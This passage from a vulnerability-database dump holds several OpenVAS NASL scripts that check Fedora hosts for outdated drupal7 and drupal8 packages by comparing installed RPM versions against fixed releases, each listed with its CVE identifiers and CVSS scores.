script_cve_id(\"CVE-2012-2922\", \"CVE-2012-5651\", \"CVE-2012-5652\", \"CVE-2012-5653\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-20766\");\n script_name(\"Fedora Update for drupal7 FEDORA-2012-20766\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.18~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:56", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-05-12T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2018-b9ad458866", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6932", "CVE-2018-7602", "CVE-2017-6929", "CVE-2017-6927", "CVE-2017-6928"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874421", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874421", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_b9ad458866_drupal7_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal7 FEDORA-2018-b9ad458866\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874421\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-12 05:59:21 +0200 (Sat, 12 May 2018)\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-7600\", \"CVE-2017-6927\", \"CVE-2017-6928\",\n \"CVE-2017-6929\", \"CVE-2017-6932\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal7 FEDORA-2018-b9ad458866\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-b9ad458866\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GYT7R43FLLEEG4N2QS3FDGZ3NNHOL3HL\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.59~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:16", "description": "The remote host is missing an update for the\n ", "cvss3": {}, "published": "2019-03-08T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2019-6a0717dc9a", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310875500", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875500", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875500\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\",\n \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2019-03-08 04:12:02 +0100 (Fri, 08 Mar 2019)\");\n script_name(\"Fedora Update for drupal8 FEDORA-2019-6a0717dc9a\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-6a0717dc9a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GLVLVCDPE4WHN5IUYGRFCMSNPXSJ56PU\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the\n 'drupal8' package(s) announced via the FEDORA-2019-6a0717dc9a advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is\n present on the target host.\");\n\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.6.10~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:06", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-05-16T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2018-8fd924a53d", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874456", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874456", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_8fd924a53d_drupal8_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-8fd924a53d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874456\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-16 05:53:29 +0200 (Wed, 16 May 2018)\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\",\n \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-8fd924a53d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-8fd924a53d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OKWJWSEKSJJSQ7G5K3DVNXGLB44LQX64\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.4.8~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:58", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-05-12T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2018-2359c2ae0e", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6932", "CVE-2018-7602", "CVE-2017-6929", "CVE-2017-6922", "CVE-2017-6927", "CVE-2017-6928"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874428", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874428", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_2359c2ae0e_drupal7_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal7 FEDORA-2018-2359c2ae0e\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874428\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-12 06:06:46 +0200 (Sat, 12 May 2018)\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-7600\", \"CVE-2017-6927\", \"CVE-2017-6928\",\n \"CVE-2017-6929\", \"CVE-2017-6932\", \"CVE-2017-6922\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal7 FEDORA-2018-2359c2ae0e\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-2359c2ae0e\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6MFVJWW3I4N6VEV7R3N23SPQMTUAXVS5\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.59~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-05-12T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2018-1ba93b3144", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874422", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874422", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_1ba93b3144_drupal8_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-1ba93b3144\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874422\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-12 05:59:57 +0200 (Sat, 12 May 2018)\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\",\n \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-1ba93b3144\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-1ba93b3144\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L2NHXS355OJ7C7ZEAGKMOPFWU6SUYYUV\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.4.8~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:03", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-12-04T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2018-7d748596e9", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310814523", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814523", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_7d748596e9_drupal8_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-7d748596e9\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814523\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-12-04 08:19:36 +0100 (Tue, 04 Dec 2018)\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-7d748596e9\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2018-7d748596e9\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZGZBSHQC6C3WLIATUZXNKC3DB73ADIXZ\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the FEDORA-2018-7d748596e9 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.6.2~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:18", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-04-03T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2019-79bd99f9a8", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2019-6341", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-04-03T00:00:00", "id": "OPENVAS:1361412562310875534", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875534", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875534\");\n script_version(\"2019-04-03T06:51:54+0000\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\", \"CVE-2019-6341\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-04-03 06:51:54 +0000 (Wed, 03 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-03 06:51:54 +0000 (Wed, 03 Apr 2019)\");\n script_name(\"Fedora Update for drupal8 FEDORA-2019-79bd99f9a8\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-79bd99f9a8\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QNTLCBAN6T7WYR5C4TNEYQD65IIR3V4P\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the FEDORA-2019-79bd99f9a8 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Drupal is an open source content management platform powering millions of\nwebsites and applications. Its built, used, and supported by an active and\ndiverse community of people around the world.\");\n\n script_tag(name:\"affected\", value:\"'drupal8' package(s) on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC28\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.6.13~1.fc28\", rls:\"FC28\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:16", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-05-08T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2019-1a3edd7e8a", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11358", "CVE-2018-7600", "CVE-2019-10911", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2019-10910", "CVE-2019-10909", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310876320", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876320", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, 